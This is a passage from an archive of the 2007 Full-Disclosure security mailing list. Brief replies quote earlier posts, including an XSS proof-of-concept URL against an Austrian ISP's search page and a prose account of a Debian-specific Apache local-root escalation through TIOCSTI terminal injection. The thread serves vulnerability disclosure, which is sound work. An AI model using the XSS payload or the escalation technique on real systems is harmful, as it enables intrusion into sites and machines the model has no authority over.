them
> a month ago though.
>
> > Sounds scary.
> Yeah, scared me when I first saw it and realised how vulnerable I'd been
for so
> long. What's also scary is the complete lack of action on what is a fairly
> serious problem. I used to think that the Debian project had a sane
attitude to
> security. Maybe all the good developers have gone to Ubuntu.
>
> Richard
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] XSS at Aon.at, Austrian ISP

2007-03-25 Thread Nikolay Kichukov
seems already fixed ... good job.

-Nikolay Kichukov

- Original Message - 
From: "Florian Stinglmayr" <[EMAIL PROTECTED]>
To: ; 
Sent: Tuesday, March 13, 2007 10:09 AM
Subject: [Full-disclosure] XSS at Aon.at, Austrian ISP


> Here we go:
> 
> http://jawe.aon.at/search/aon.sp?query=alert(1);
> 
> The issue has been reported to AON before.
> 
> Regards,
> Florian Stinglmayr
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)

2007-02-26 Thread Nikolay Kichukov
Lool,
how long has this bug been around?

Sounds scary.

-nik

On Mon, February 26, 2007 8:11 pm, Richard Thrippleton wrote:
> Version 1.3.34-4 of Apache in the Debian Linux distribution contains a
> hole that allows a local user to access a root shell if the webserver has
> been restarted manually. This bug does not exist in the upstream apache
> distribution, and was patched in specifically by the Debian distribution.
> The
> bug report is located at
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=357561 . At the time of
> writing (over a month since the root hole was clarified), there has been
> no official acknowledgement. It is believed that most of the developers
> are tied up in more urgent work, getting the TI-86 distribution of Debian
> building in time for release.
>
> Unlike every other daemon, apache does not abdicate its controlling tty
> on startup, and allows it to be inherited by a cgi script (for example, a
> local user's CGI executed using suexec). When apache is manually
> restarted, the inherited ctty is the stdin of the (presumably root) shell
> that invoked the new instance of apache. Any process is permitted to
> invoke the TIOCSTI ioctl on the fd corresponding to its ctty, which allows
> it to inject characters that appear to come from the terminal master.
> Thus, a user created CGI script can inject
> and have executed any input into the shell that spawned apache.
>
> As a Debian user, this concerns me greatly, as any non-privileged user
> would be able to install non-free documentation (GFDL) on any system I
> run.
>
> Richard
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] What happens to Your Computer if you MispellGoogle.com

2007-01-21 Thread Nikolay Kichukov
I agree ;-)


- Original Message - 
From: "pdp (architect)" <[EMAIL PROTECTED]>
To: ; "Web Security" 
<[EMAIL PROTECTED]>
Sent: Sunday, January 21, 2007 1:44 PM
Subject: [Full-disclosure] What happens to Your Computer if you 
MispellGoogle.com


> http://www.gnucitizen.org/blog/what-happens-to-your-computer-if-you-mispell-googlecom
>
> it is worth seeing this
>
> -- 
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/